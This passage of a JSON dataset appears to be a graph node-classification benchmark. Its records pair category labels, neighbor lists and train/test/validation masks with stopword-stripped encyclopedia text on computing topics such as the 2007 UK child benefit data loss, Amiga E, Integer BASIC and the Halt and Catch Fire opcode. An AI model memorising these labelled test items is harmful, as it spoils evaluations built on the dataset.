mainly embedded programmer however methods proprietary highly hardware application specific used well",
    "neighbors": [
      11077,
      10734,
      7983,
      8624,
      2066,
      10675,
      5844,
      9911,
      8120,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 5726,
    "label": 4,
    "text": "Loss_of_United_Kingdom_child_benefit_data_(2007):loss united kingdom child benefit data 2007 loss united kingdom child benefit data data breach incident october 2007 two computer discs owned majesty revenue customs containing data relating child benefit went missing incident announced chancellor exchequer alistair darling 20 november 2007 two discs contained personal details families united kingdom claiming child benefit takeup uk near 100 discs sent junior staff hm revenue customs hmrc based waterview park washington tyne wear national audit office nao unrecorded internal mail via tnt october 18 october 24 nao complained hmrc received data november 8 senior officials hmrc informed loss chancellor exchequer alistair darling informed november 10 november 20 darling announced lost data thought concern approximately 25 million people uk nearly half country population personal data missing discs reported include names addresses parents children dates birth children together national insurance numbers bank building society details parents password protection question provided winzip version 8 weak proprietary scheme unnamed encryption hash algorithms well-known attacks anyone competent computing would able break protection downloading readily-available tools winzip version 9 introduced aes encryption would secure breakable correctly knowing passphrase list frequently asked questions bbc news website breakdown loss reported whilst government ministers claimed junior official blame conservatives said fault lay part senior management based claim national audit office requested bank details removed data sent hmrc denied request would costly complicated emails released 22 november confirmed senior hmrc officials made aware decision cost grounds strip sensitive information cost removing sensitive information given £5,000 although cost found substantially less £650 academic study according trade journal computer weekly said back march 2007 nao asked completed information child benefit database sent post cds instead sample database first time done things went smoothly package registered post however time unregistered courier later revealed 17 december 2007 data protection manual hmrc restriction senior members staff junior civil servants summary manual says security followed several data scandals 17th december revealed ruth kelly details three million learner drivers lost united states however details said lost name address phone number fee paid test centre payment code e-mail much panic caused due reduced risk financial fraud 23 december revealed nine nhs trusts also lost data hundreds thousands patients archive information medical records contact details soft financial data trusts also lost data found fairly quickly several uk firms also admitted security failings darling stated indication details fallen criminal hands urged affected monitor bank accounts said someone innocent victim fraud result incident people assured protection banking code suffer financial loss result hmrc set child benefit helpline concerned data loss incident breach uk data protection act resulted resignation hmrc chairman paul gray darling commented discs probably destroyed hunt probably within days opaque management structure hmrs difficult see responsible gray subsequently found working cabinet office metropolitan police independent police complaints commission investigated security breach uniformed police officers investigated hmrc offices loss led much criticism acting leader liberal democrats vince cable shadow chancellor george osborne osborne said addition said final blow ambitions government create national id database cable also criticised use disks modern age electronic data transfer spokespersons gordon brown however said prime minister fully supported darling said darling expressed intention resign general reaction public one anger worry banks individuals businesses government departments became vigilant data fraud identity theft government pledged careful data public media particularly angry fact data registered recorded securely encrypted nick assinder political correspondent bbc expressed opinion believed darling borrowed time george osborne questioned whether darling job suggested would matter days decision made regarding darling future however darling remained chancellor labour defeat 2010 tnt stated delivery recorded would possible even ascertain actually sent let alone went 7 january 2008 jeremy clarkson found subject direct debit fraud publishing bank account sort code details column sun make point public concern scandal unnecessary wrote “ 'll able put money account take honestly 've never known palaver nothing ” someone used details set £500 direct debit charity diabetes uk next sunday times column clarkson wrote “ wrong punished mistake.″ terms direct debit guarantee payment could reversed",
    "neighbors": [
      5858,
      1251,
      5133,
      11347,
      1275
    ],
    "mask": "Test"
  },
  {
    "node_id": 5727,
    "label": 1,
    "text": "SQL_Database_Studio:sql database studio sql database studio professional client microsoft sql server developed jan prochazka czech republic sql database studio sds used database developers designing database also average users browsing data sds comes two version express version free even commercial purposes lacks features pro version sds allows visualization gps data built using wpf application running microsoft .net framework 4.5",
    "neighbors": [
      1348,
      6797,
      7983,
      3573,
      11030,
      9177
    ],
    "mask": "Test"
  },
  {
    "node_id": 5728,
    "label": 4,
    "text": "Backup_validation:backup validation backup validation process whereby owners computer data may examine data backed order understand risk data loss might also speaks optimization processes charging well estimating future requirements sometimes called capacity planning past several decades leading 2005 organizations banks governments schools manufacturers others increased reliance open systems less closed systems example 25 years ago large bank might critical data housed ibm mainframe computer closed system today bank might store substantially greater portion critical data spreadsheets databases even word processing documents i.e. open systems problem open systems primarily unpredictable nature nature open system exposed potentially thousands millions variables ranging network overloads computer virus attacks simple software incompatibility one indeed several combination factors may result either lost data and/or compromised data backup attempts types problems generally occur closed systems least unpredictable ways old days backups nicely contained affair today ubiquity dependence upon open systems entire industry developed around data protection three key elements data protection validation optimization chargeback validation process finding whether backup attempt succeeded whether data backed enough consider protected process usually involves examination log files smoking gun often left behind backup attempts takes place well media databases data traffic even magnetic tapes patterns detected key error messages identified statistics extracted order determine backups worked according veeam availability report 2014 organizations test backups recoverability average every eight days however quarter organizations test average 5.26 percent backups meaning vast majority backups verified could fail cause downtime optimization process examining productivity patterns process backup determine improvements made often certain less important backup jobs may eliminated entirely often service backing data done one person persons service others owners data becoming prevalent today also charging services back data owner simple fee per backup might agreed upon often case complex charge based success rates speed size frequency retention long copy kept put place usually form service level agreement sla place backup service provider data owner agreed done service charged",
    "neighbors": [
      9025,
      7739,
      3323,
      3366
    ],
    "mask": "None"
  },
  {
    "node_id": 5729,
    "label": 9,
    "text": "Amiga_E:amiga e amiga e often simply e programming language created wouter van oortmerssen amiga since moved develop sheep programming language new amigade platform cryscript language also known dog used development video game far cry amiga e combination many features number languages follows original c programming language closely terms basic concepts amiga e main benefits fast compilation allowing used place scripting language readable source code flexible type system powerful module system exception handling c++ variant object oriented programming hello world program amiga e looks like codice_1 amiga e used create core popular amiga graphics software photogenics 1993 first public release amiga e. 1997 last version amiga e released 3.3a 1999 unlimited compiler executable amiga e released 1999 source code amiga e compiler m68k assembler released gpl 1999 first version creative released based sourcecode amiga e. 1999 first version powerd released 0.01 2000 first version yaec yet another e compiler released 1.0 2001 final version creative 2.12.3 released 2002 final version yaec released 2.5d 2002 first public release ecx 1.0 2003 final version powerd released 0.20 2008 first public release portable r1 2008 first public release 0.9 2009 first public release portable microsoft windows r4 first compiler written m68k assembler support tools written e. generates m68000 machine code directly based gpl sources amiga e adds many extensions compiler based amigae language compatible due changes syntax written scratch e. uses external assembler linker compiler tools written scratch e compile supports multiple targets adds many extensions based amigae language fully compatible changes syntax additions inspired powerd meta-compiler written scratch e compile supports multiple targets",
    "neighbors": [
      256,
      6797,
      5264,
      2193,
      9236,
      3233,
      9249,
      8618,
      6062,
      432,
      8369,
      8115,
      10819,
      11076,
      8262,
      10570,
      5709,
      4564,
      11370,
      5743,
      11123,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5730,
    "label": 2,
    "text": "MINIMOP:minimop minimop operating system ran international computers limited icl 1900 series computers minimop provided on-line time-sharing environment multiple online programming mop icl terminology typically ran alongside george 2 running batch jobs minimop named reflect role alternative mop facilities george 3 required powerful machine minimop would run 1900 processors apart low-end 1901 1902 required 16k words memory two 4 8 million character magnetic disks user provided fixed size file hold data subdivided number variable sized subfiles command language could extended simple macros minimop implemented multithreaded sub-programmed icl terminology user level program running standard executive low level operating system icl 1900 program control facilities executive used run user programs minimop user i/o operations trapped minimop emulated rather accessing real peripherals memory premium user programs would swapped memory whenever needed wait input output reached end time slice queen mary college london queen mary university london later developed maximop improved system largely compatible minimop icl universities sales region started distributing maximop used 100 sites",
    "neighbors": [
      11075,
      3594,
      2541,
      5455,
      7983,
      406,
      4151,
      731
    ],
    "mask": "Test"
  },
  {
    "node_id": 5731,
    "label": 2,
    "text": "Jef_Poskanzer:jef poskanzer jeffrey a. poskanzer computer programmer first person post weekly faq usenet developed portable pixmap file format pbmplus precursor netpbm package manipulate also worked team ported a/ux shared two usenix lifetime achievement awards – 1993 berkeley unix 1996 software tools project owns internet address acme.com notable receiving one million e-mail spams day home page acme laboratories hosts number open source software projects major projects maintained include pbmplus thttpd open source web server",
    "neighbors": [
      3241,
      9580,
      2287,
      3350,
      8671
    ],
    "mask": "None"
  },
  {
    "node_id": 5732,
    "label": 7,
    "text": "Citrix_Cloud:citrix cloud citrix cloud cloud management platform allows organizations deploy cloud-hosted desktops apps end users developed citrix systems released 2015 citrix cloud cloud-based platform managing deploying citrix products desktops applications end users using type cloud whether public private hybrid on-premises hardware product supports cloud-based versions every major citrix product accessed together integrated workspace independently citrix cloud enables cloud services citrix products xenapp xendesktop xenmobile sharefile netscaler addition citrix developed several cloud-native services including secure browser service citrix cloud compatible device cloud data center synced via citrix cloud connector may 2016 citrix states microsoft azure preferred cloud partner citrix platforms reside citrix cloud however applications resources may make use clouds infrastructures company department retains ability choose custom combination data centers cloud providers citrix continuously updates citrix cloud users automatically running current version 2015 citrix cloud offers four different service packages citrix workspace cloud announced may 2015 company industry conference citrix synergy offering launched august 2015 four core services app desktop service lifecycle management secure documents mobility company positioned workspace cloud alternative xendesktop xenapp company traditional desktop application virtualization platforms company renamed citrix workspace cloud citrix cloud may 2016.r addition cloud services renamed cloud-based versions citrix products xendesktop xenapp service sharefile xenmobile service replaced desktop app service secure documents service mobility service respectively company also announced 2016 citrix cloud users windows 10 enterprise customers would able access windows 10 images azure via xendesktop without pay additional license fee prior release citrix workspace cloud praised desktop virtualization blogger brian madden concept cmswire noted stood among competitors product kind following release techtarget stated platform intriguing provide something professionals wanted long time centralized management on-premises cloud desktop application workloads also surprisingly expensive review computerworld suggested hybrid nature product compatible rising use hybrid cloud implementations businesses citrix would need ensure adequate support critical applications make sure company policies access rules followed properly",
    "neighbors": [
      6018,
      1539,
      8451,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      5499,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      5535,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      582,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      1239,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      3822,
      8044,
      2170,
      5371,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 5733,
    "label": 9,
    "text": "Integer_BASIC:integer basic integer basic written steve wozniak basic interpreter apple original apple ii computers originally available cassette included rom original apple ii computer release 1977 first version basic used many early home computer owners language supported mathematics using integers lacking floating point support using integers allowed numbers stored much compact 16-bit format could rapidly read processed 6- 9-byte floating point formats found basics era however limited applicability general purpose language integer basic phased favor applesoft basic starting apple ii plus 1979 licensed modified version microsoft basic included floating point support missing integer basic steve wozniak first used basic computer language late 1960s time-sharing computer terminal california high school read 101 basic computer games member homebrew computer club 1970s decided computer designed would able play games book run logic simulations worked hewlett-packard hp wozniak knew bill gates written altair basic intel 8080 microprocessor hoped would first write one mos technology 6502 wozniak would later describe language intended primarily games educational uses experience basic days time-sharing system high school without access system wozniak write language—which called game basic —on paper hand assembling language 6502 machine code without training write computer language used hp experience implement stack machine interpret expressions wozniak previously studied hp basic manual borrowed work knowing syntax hp version language different dec basic language 101 basic computer games altair basic save time games logic simulations emphasized integer math wozniak removed floating-point routines game basic interpreter would implement 16-bit integer calculations wozniak previously developed breakout atari hardware hoped implement game basic designing apple ii computer wozniak added support color graphics game paddles sound language named integer basic language needed 4k ram made minimum memory apple ii demonstrating computer brick steve jobs wozniak demonstrated could quickly change colors game used altering source code woz later wrote proved software much flexible hardware jobs realized anyone could create arcade games without design hardware wozniak demonstrated brick meeting homebrew computer club later described satisfying day life ... seemed like huge step designing hardware arcade games knew able program basic going change world integer basic roms also included machine code monitor mini-assembler disassembler create debug assembly language programs interpreter 16-bit bytecode language called sweet16 wozniak hand assembled monitor apple ii first program used write integer basic",
    "neighbors": [
      9732,
      7691,
      1549,
      7188,
      22,
      4136,
      6700,
      11315,
      9784,
      8767,
      576,
      4160,
      4674,
      8774,
      92,
      3691,
      7281,
      5747,
      6264,
      6778,
      7806,
      2686,
      3718,
      9871,
      11412,
      3736,
      5784,
      9881,
      4251,
      3233,
      171,
      7343,
      3248,
      7355,
      7870,
      712,
      3790,
      3286,
      4318,
      231,
      2282,
      4844,
      8429,
      759,
      7421,
      6910,
      5384,
      1805,
      9997,
      9999,
      786,
      4888,
      797,
      5412,
      5925,
      10533,
      8494,
      303,
      315,
      7486,
      9022,
      1346,
      11075,
      838,
      10750,
      847,
      1879,
      6495,
      2915,
      9063,
      10602,
      10608,
      6539,
      3481,
      9123,
      11683,
      8101,
      10666,
      477,
      11229,
      4068,
      5093,
      9188,
      8170,
      11243,
      2541,
      7154,
      9714,
      11257,
      6654,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 5734,
    "label": 1,
    "text": "Linter_SQL_RDBMS:linter sql rdbms linter sql rdbms main product relex group linter russian dbms compliant standard supporting majority operating systems among windows various versions unix qnx others system enables transparent interaction client applications database server functioning different hardware software environments dbms linter includes program interfaces majority popular development tools system provides high data security level allowing user work secret information linter dbms certified fstec russia compliant class 2 data security requirements level 2 undeclared feature absence control many years linter used russian ministry defense ministry foreign affairs government bodies history linter dates back 1980 system domestic predecessors whose developers later took direct part creation linter 1983 according state order voronezh construction design office systemprogramm successfully completed relational dbms bars real-time operating system rafos rt-11 prototype computers sm set since 1985 system developers accepted mobility compatibility openness concept result dbms intereal implemented system covered wide spectrum hardware software platforms electronika-85 intel 8086 control modules sm1702 electronika-82 computer complexes vax prototypes 1990 dbms development team founded research-and-production company relex relational expert systems time dbms linter launched late 1990s linter-vs 6.0 developed part project performed relex russian ministry defense prototype system linter 5.7 1999 developed relex linter-vs 6.0 available os msvs mobile system armed forces also exists linter-vs 6.0.1 developed vniins based postgresql 7.2 system also available os msvs. br relx embedded compact american/japanese-developed version linter implemented sony products including linter phone sony ericsson so903i well kenwood navigation system hdd smá navi emotional sound hdv-990 hdv-790",
    "neighbors": [
      6797,
      10286,
      5492,
      10389,
      11604,
      8539,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5735,
    "label": 3,
    "text": "Xevious:_Fardraut_Saga:xevious fardraut saga msx2 version players select two modes title screen recon port original xevious scramble new 16-area game new enemies new boss battles well andor genesis four ships solvalou solgrado zeodalley gampmission two modes renamed arcade fardraut pc engine version however fardraut bit different original scramble 4-stage game new enemies different ship level end level boss battle similar andor genesis end level level players given dialogue story given game",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5736,
    "label": 3,
    "text": "Commodore_CDTV:commodore cdtv cdtv commodore dynamic total vision later treated backronym compact disc television home multimedia entertainment video game console – convertible full-fledged personal computer addition optional peripherals – developed commodore international launched april 1991 cdtv essentially commodore amiga 500 home computer cd-rom drive remote control optional keyboard mouse floppy disk drive gained functionality regular amiga commodore marketed machine all-in-one multimedia appliance targeted market philips cd-i expected market multimedia appliances materialize neither machine met real commercial success though cdtv based entirely amiga hardware marketed strictly cdtv amiga name omitted product branding commodore announced cdtv summer 1990 consumer electronics show chicago promising release end year 100 software titles product debuted north america march 1991 ces las vegas uk world commodore 1991 earls court london advertised £499 cdtv unit remote control two software titles device released united states 999 1990 computer gaming world stated commodore poor reputation among consumers developers citing abysmal record customer technical support past company chose amiga-enthusiast magazines chief advertising channel amiga community whole avoided cdtv expectation add-on cd-rom drive amiga eventually came form a570 hurt sales cdtv a570-equipped a500 electronically cdtv consequently could run cdtv software little motivation amiga owner buy cdtv commodore would rectify cdtv successor a1200-based amiga cd32 adding akiko chip enabling developers produce cd32 games playable cd32 however nolan bushnell one chief endorsers cdtv argued system high price alone enough explain market failure ... difficult sell significant numbers anything 500 ... felt could sell hundred thousand something costs 800 standing head thought would no-brainer tell number units sold u.s. 800 could put eye draw tears cdtv supplied amigaos 1.3 rather advanced user-friendly 2.0 release launched around time notably cdxl motion video format primarily developed cdtv making one earliest consumer systems allow video playback directly cd-rom 1994 computer gaming world described cdtv fiasco commodore though company later developed improved cost-reduced cdtv-ii never released commodore discontinued cdtv 1993 launch amiga cd32 substantially based amiga hardware case newer amiga 1200 explicitly targeted games market cdtv intended media appliance rather mainstream personal computer housing dimensions styling fairly comparable household stereo system components period came infrared remote control similarly initially sold without keyboard mouse could added separately later bundled machine cdtv based technology earlier amiga systems featured single-speed cd-rom drive floppy disk drive standard cdtv compatible many amiga peripherals period addition official cdtv peripherals upgrades included",
    "neighbors": [
      9091,
      9477,
      780,
      5264,
      2193,
      9236,
      921,
      3233,
      4385,
      8355,
      9249,
      8618,
      6062,
      7983,
      432,
      8369,
      8115,
      5686,
      6468,
      7108,
      11076,
      10570,
      10316,
      5709,
      4564,
      8917,
      5598,
      7269,
      8937,
      11370,
      7916,
      6765,
      5743,
      1776,
      7281,
      11123,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 5737,
    "label": 4,
    "text": "Advanced_Maryland_Automatic_Network_Disk_Archiver:advanced maryland automatic network disk archiver amanda previously known advanced maryland automatic network disk archiver open source computer archiving tool able back data residing multiple computers network uses client–server model server contacts client perform backup scheduled time amanda initially developed university maryland released bsd-style license amanda available free community edition fully supported enterprise edition amanda runs almost unix unix-like systems amanda supports windows systems using samba native win32 client support open files amanda supports tape-based disk-based backup provides useful functionality available backup products amanda supports tape-spanning i.e backup set fit one tape split multiple tapes among key features intelligent scheduler optimizes use computing resources across backup runs recent stable release version 3.5.1 released december 01 2017 amanda enterprise edition commercial version amanda developed zmanda includes management gui—zmanda management console zmc —and features scheduler plugin framework also optional cloud backup service support cloud backup option uses amazon s3 service amazon web services cloud storage provider enables safe offsite storage amanda backup data plugin framework allows application-specific backups used amanda enterprise support applications oracle database samba network share ndmp etc amanda enterprise also supports image-level backup live vms running vmware infrastructure",
    "neighbors": [
      9025,
      11201,
      10276,
      6565,
      8582,
      6280,
      1358,
      7983,
      7248,
      5492,
      5397,
      1942,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5738,
    "label": 8,
    "text": "OpenFIRST:openfirst openfirst integrated set modules may used together create enhance web site directed towards teams participating first competition software written maintained group students members first teams across world code mailing lists hosted sourceforge openfirst compatible linux microsoft windows operating system run php compatible apache microsoft iis sambar webservers use mysql odbc microsoft sql server dbms php access database required openfirst project founded tim ginn team david dibiase team 2003 however due rules set first relating website award founders longer work code since graduated high school current lead developer wikipedia editor jamie bliss wikipedia username astronouth7303 team current aim openfirst developers modernize internal structure previously semi-compatible php3 could described hackish openfirst code cvs object-oriented degree harnesses features renovation also adds number features editor box shared modules settings saving loading api skinning",
    "neighbors": [
      865,
      5250,
      1668,
      8644,
      5612,
      6797,
      7022,
      7983,
      119,
      11030,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 5739,
    "label": 3,
    "text": "Computer_for_operations_with_functions:computer operations functions computer operations mathematical functions unlike usual computer operates functions hardware level i.e without programming operations computing machine operations functions presented developed mikhail kartsev 1967 among operations computing machine functions addition subtraction multiplication functions comparison operations function number finding function maximum computing indefinite integral computing definite integral derivative two functions derivative two functions shift function along x-axis etc architecture computing machine using modern terminology vector processor array processor central processing unit cpu implements instruction set containing instructions operate one-dimensional arrays data called vectors used fact many operations may interpreted known operation vectors addition subtraction functions addition subtraction vectors computing definite integral two functions derivative— computing vector product two vectors function shift along x-axis – vector rotation axes etc 1966 khmelnik proposed functions coding method i.e functions representation uniform function whole positional code mentioned operations functions performed unique computer operations codes single arithmetic unit positional code integer number formula_1 numeral notation digits formula_2 certain positional number system form code may called linear unlike positional code one-variable formula_4 function formula_5 form flat triangular digits comprise triangle value positional number formula_1 sum formula_9 radix said number system positional code one-variable function correspond 'double code form formula_11 integer positive number quantity values taken formula_2 formula_13 certain function argument formula_4 addition positional codes numbers associated carry transfer higher digit according scheme addition positional codes one-variable functions also associated carry transfer higher digits according scheme transfer carried simultaneously two higher digits triangular code called r-nary denoted formula_17 numbers formula_18 take values set example triangular code ternary code formula_22 formula_23 quaternary formula_24 formula_25. br r -nary triangular codes following equalities valid formula_27 arbitrary number exists formula_17 arbitrary integer real number particular formula_29 also exists formula_17 function form formula_31 instance formula_32 r-nary triangular codes consists following procedure described also one-digit addition numbers table one-digit addition values terms formula_45 formula_46 must present values carries appearing decomposition sum formula_38 table may synthesized formula_48 br written table one-digit addition formula_49 r-nary triangular codes differs one-digit addition fact given formula_33-digit value formula_34 determined formula r-nary triangular codes based using correlation follows division digit causes carries two lowest digits hence digits result operation sum quotient division digit r two carries two highest digits thus divided parameter r procedure described table one-digit division parameter r values terms values carries appearing decomposition sum formula_56 must present table may synthesized formula_48 br table given one-digit division parameter r formula_49 r-nary triangular codes consists positional codes numbers subsequently performed one-digit operations mind one-digit operations digits column performed simultaneously r-nary triangular codes multiplication code formula_66 formula_33-digit another code formula_68 consists formula_33-shift code formula_66 i.e shift k columns left rows multiplication codes formula_66 formula_68 consists subsequent formula_33-shifts code formula_66 addition shifted code formula_66 part-product positional codes numbers r-nary triangular codes derivative function formula_5 defined derivation triangular codes function formula_5 consists determining triangular code partial derivative formula_79 multiplication known triangular code derivative formula_80 determination triangular code partial derivative formula_79 based correlation derivation method consists organizing carries mk-digit m+1 k -digit m-1 k -digit summing given digit performed way one-digit addition r-nary triangular codes function represented series form integer coefficients formula_84 may represented r-nary triangular codes coefficients functions formula_85 r-nary triangular codes mentioned beginning section hand r-nary triangular code may represented said series term formula_86 positional expansion function corresponding code may represented similar series r-nary triangular codes name operation reducing number non -zero columns necessity truncation appears emergence carries beyond digit net truncation consists division parameter r. coefficients series represented code reduced r times fractional parts coefficients discarded first term series also discarded reduction acceptable known series functions converge truncation consists subsequently performed one-digit operations division parameter r. one-digit operations digits row performed simultaneously carries lower row discarded r-nary triangular code accompanied scale factor similar exponent floating-point number factor permits display coefficients coded series integer numbers factor multiplied r code truncation addition factors aligned one added codes must truncated multiplication factors also multiplied positional code function two variables depicted figure 1 corresponds triple sum form formula_87 br formula_11 integer positive number number values figure formula_89 formula_90 — certain functions arguments formula_91 correspondingly figure 1 nodes correspond digits formula_89 circles values indexes formula_93 corresponding digit shown positional code function two variables called pyramidal positional code called r-nary denoted formula_94 numbers formula_89 assume values set formula_96 addition codes formula_94 carry extends four digits hence formula_98 positional code function several variables corresponds sum form formula_11 integer positive number number values digit formula_101 formula_102 certain functions arguments formula_103 positional code function several variables called hyperpyramidal figure 2 depicted example positional hyperpyramidal code function three variables nodes correspond digits formula_104 circles contain values indexes formula_105 corresponding digit positional hyperpyramidal code called r-nary denoted formula_106 numbers formula_101 assume values set formula_96 codes addition formula_106 carry extends -dimensional cube containing formula_110 digits hence formula_111",
    "neighbors": [
      9126,
      9932,
      1776,
      4465,
      11487
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5740,
    "label": 4,
    "text": "Guksae:guksae guksae oksae 국새 옥새 official seal made used lieu signatures personal documents office paperwork contracts art item requiring acknowledgment authorship south korea guksae carved characters called injang establishment south korean state 1948 government created new state seal guksae 국새 國璽 used promulgation constitution designation cabinet members ambassadors conference national orders important diplomatic documents",
    "neighbors": [
      9334
    ],
    "mask": "None"
  },
  {
    "node_id": 5741,
    "label": 9,
    "text": "Genius_(mathematics_software):genius mathematics software genius also known genius math tool free open-source numerical computing environment programming language similar aspects matlab gnu octave mathematica maple genius aimed mathematical experimentation rather computationally intensive tasks also useful calculator programming language called gel aims mathematically friendly syntax software comes command-line interface gui uses gtk+ libraries graphical version supports 2d 3d plotting graphical version includes set tutorials originally aimed class demonstrations genius original calculator gnome project started 1997 split separate project soon 0.13 release gnome 1998 ancestry also known genius calculator gnome genius attempt merge genius dr. geo interactive geometry software merge never materialized version 1.0 released 2007 almost 10 years initial release sample definition function calculating factorial recursively gel contains primitives writing product iteratively hence get following iterative version",
    "neighbors": [
      7301,
      5129,
      3980,
      15,
      8079,
      7580,
      5148,
      7326,
      7341,
      9133,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      8262,
      5833,
      11239,
      4840,
      363,
      5612,
      7148
    ],
    "mask": "None"
  },
  {
    "node_id": 5742,
    "label": 2,
    "text": "Aurora_SPARC_Linux:aurora sparc linux aurora sparc linux operating system based fedora core sparc-based computers aurora originally created red hat dropped support sparc architecture red hat linux 6.2 name derives internal sun codename sparcstation 5 chassis since aurora derived fedora developers located us maintains packages legally distributable united states like fedora red hat linux aurora names releases like fedora core aurora includes core set packages downloading installing programs codecs distributed aurora several repositories available currently aurora extras official status repository supports currently released version aurora sparc linux build 2.0 aurora extras maintained group volunteers link extras currently included base distribution extra configuration required enable",
    "neighbors": [
      8837,
      9353,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9064,
      9253,
      10149,
      6055,
      11305,
      7854,
      7983,
      561,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      9665,
      2375,
      4039,
      5067,
      8907,
      1110,
      2134,
      9693,
      2914,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      6380,
      7020,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      9455,
      9461,
      10860,
      1399,
      6393,
      8186,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5743,
    "label": 2,
    "text": "Magic_User_Interface:magic user interface magic user interface mui short object-oriented system stefan stuntz generate maintain graphical user interfaces aid preferences program user application ability customize system according personal taste magic user interface written amigaos gained popularity amongst programmers users ported powerpc processors adopted default gui toolkit morphos operating system mui application programmer interface cloned zune toolkit used aros research operating system creating gui applications amiga difficult long time mainly programmer got minuscule amount support operating system beginning kickstart 2.0 gadtools.library step right direction however even using library generate complex flexible interfaces remained difficult still required great deal patience largest problem existing tools creation user interfaces inflexible output programs still using built-in fonts window sizes thus making use new high resolution graphics hardware adapters nearly unbearable even preference programs workbench still using default fixed-width font 1992 stefan stuntz started developing new object-oriented gui toolkit amiga main goals new gui toolkit mui released shareware starting mui 3.9 unrestricted version integrated morphos shareware key still required activate user configuration options amigaos ui development done source-code level without aid gui builders mui application programmer defines logical structure gui layout determined run time depending user configuration unlike gui toolkits developer determine exact coordinates ui objects relative placement using object groups traditional intuition-based ui coding programmer calculate placement gadgets relative font border sizes default ui elements resizable change size match window size also automatically switch smaller font hide ui elements enough space screen display window full contents makes easy build ui adapts well tiny large displays well 50 built-in mui classes today various third-party mui classes example code creates small mui application text hello world displayed also possible embed boopsi based gui toolkit objects inside mui application notable applications use mui widget toolkit include currently two main widget toolkits amiga world competing widely used mui adopted aros morphos amiga programs one reaction adopted amigaos 3.5 development gtk mui wrapper allow porting various gtk based software also modern interfaces based xml feelin mui extended workbench four-colour palette four additional colours allowing smoother gradients less noticeable dithering magicwb companion mui made use extended palette provide attractive icons replace dated workbench defaults mui 4 added support alpha blending support user defined widget shapes",
    "neighbors": [
      2062,
      9236,
      9245,
      9249,
      9762,
      2603,
      5165,
      5677,
      3631,
      576,
      8771,
      5709,
      6233,
      10841,
      5729,
      2658,
      5736,
      11370,
      8303,
      8304,
      2673,
      9848,
      5754,
      7292,
      1664,
      8832,
      1666,
      139,
      6797,
      5264,
      2193,
      2197,
      3734,
      3233,
      4777,
      8369,
      11442,
      692,
      1742,
      4822,
      9943,
      9434,
      10470,
      10480,
      9491,
      1812,
      4387,
      3876,
      11559,
      7983,
      1347,
      1348,
      11076,
      10570,
      8524,
      850,
      6995,
      8554,
      9579,
      11123,
      5492,
      3462,
      8582,
      10654,
      9128,
      8618,
      6062,
      432,
      8114,
      8115,
      6075,
      8644,
      4550,
      7629,
      4564,
      479,
      5612,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5744,
    "label": 3,
    "text": "Halt_and_Catch_Fire:halt catch fire computer engineering halt catch fire known assembly mnemonic hcf idiom referring computer machine code instruction causes computer central processing unit cpu cease meaningful operation typically requiring restart computer originally referred fictitious instruction ibm system/360 computers making joke numerous non-obvious instruction mnemonics advent mc6800 design flaw discovered programmers due incomplete opcode decoding two illegal opcodes 0x9d 0xdd cause program counter processor increment endlessly renders processor useless codes unofficially named hcf design process mc6802 engineers originally planned remove instruction kept as-is testing purposes result hcf officially recognized real instruction later hcf became humorous term instructions may freeze processor including intentional instructions testing purposes unintentional illegal instructions considered hardware defects system shared malicious user execute launch denial-of-service attack case real instructions implication expression whereas cases cpu executes unintended instruction bug code computer may still able recover case hcf instruction definition way system recover without restart expression catch fire context normally facetious rather literal referring total loss cpu functionality current session imaginative idea cpu chip would switching bus circuits fast would cause overheat burn computer assembly language mnemonics used directly equivalent machine code instructions mnemonics frequently three letters long add cmp compare two numbers jmp jump different location program hcf instruction originally fictitious assembly language instruction said development ibm use system/360 computers along many amusing three-letter acronyms like xpr execute programmer cai corrupt accounting information similar joke mnemonics sdi self destruct immediately crn convert roman numerals list mnemonics including hcf shows overextended mnemonics april 1980 creative computing flip-side parody issue ibm system/360 already included numerous non-obvious mnemonics like zap zero add packed edmk edit mark trt translate test read backward i/o channel command programmers began creating similarly cryptic fictitious instructions humorous vein 1990 usenet discussion claimed hcf dated back 1977 rick cook science fiction/fantasy novel wizardry compiled programmers transported universe magic could programmed one refers command hmcf halt melt catch fire cpu designers sometimes incorporate one undocumented machine code instructions testing purposes ibm system/360 diagnose instruction instructions intended executed normal operation cpu actually executed program normal operation unusual side-effects halt catch fire hcf instruction mnemonic sometimes appropriated users discover instructions humorous way expressing unintended execution instruction causes system fail perform normal functions motorola 6800 microprocessor first undocumented assembly mnemonic hcf became widely known operation codes opcodes—the portions machine language instructions specify operation performed —hexadecimal 9d dd reported given unofficial mnemonic hcf article written gerry wheeler december 1977 issue byte magazine undocumented opcodes wheeler noted motorola reported 197 valid operation codes m6800 processor inferred 256 possible 8 bit combinations must 59 invalid instructions goes describe hcf big surprise saying catch fire portion moniker well almost process reviewed david agans thus old days motorola 6800 microprocessor instruction code dd caused processor go endless loop reading memory address order engineers referred 'halt catch fire hcf instruction remembered code calling 'drop dead instruction drop dead mode wonderful spotting hardware timing address logic problems scope address clock lines nice cycling square waves either opcode made processor enter mode continuously performing memory read cycles successive addresses intervening instruction fetches hence address bus effectively became counter allowing operation address lines quickly verified processor entered mode responsive 